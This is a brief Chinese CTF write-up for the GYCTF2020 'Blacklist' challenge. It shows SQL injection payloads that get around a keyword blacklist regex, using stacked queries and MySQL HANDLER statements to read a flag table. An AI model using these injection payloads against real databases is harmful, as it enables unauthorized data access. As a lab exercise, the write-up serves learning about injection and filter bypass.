GYCTF2020-Blacklist

发表于2021-02-08更新于2021-03-27阅读次数

1. 首页

四不四很熟悉,和“随便注”的题目很相似;

万能头注入一遍

1
1' or 1=1#

存在注入

2. 查看数据库

1
1' union select databases#

回显出过滤的正则匹配

1
return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);

很明显过滤了比上面一道题多了“rename”和“alter”,这意味着我们不能用上面的方法了

3. 查看数据表

1
1';show tables;#

回显出“FlagHere”和“words”这两个数据表;

4. 使用handler语句

1
1';handler `FlagHere` open;handler `FlagHere` read first;handler `FlagHere` close;

5. HANDLER语句解释

1
2
3
handler ... open      #打开一个表
handler ... read      #访问表内容,在调用close前是不会关闭的
handler ... close     #关闭会话

Handler官方文档

其他参考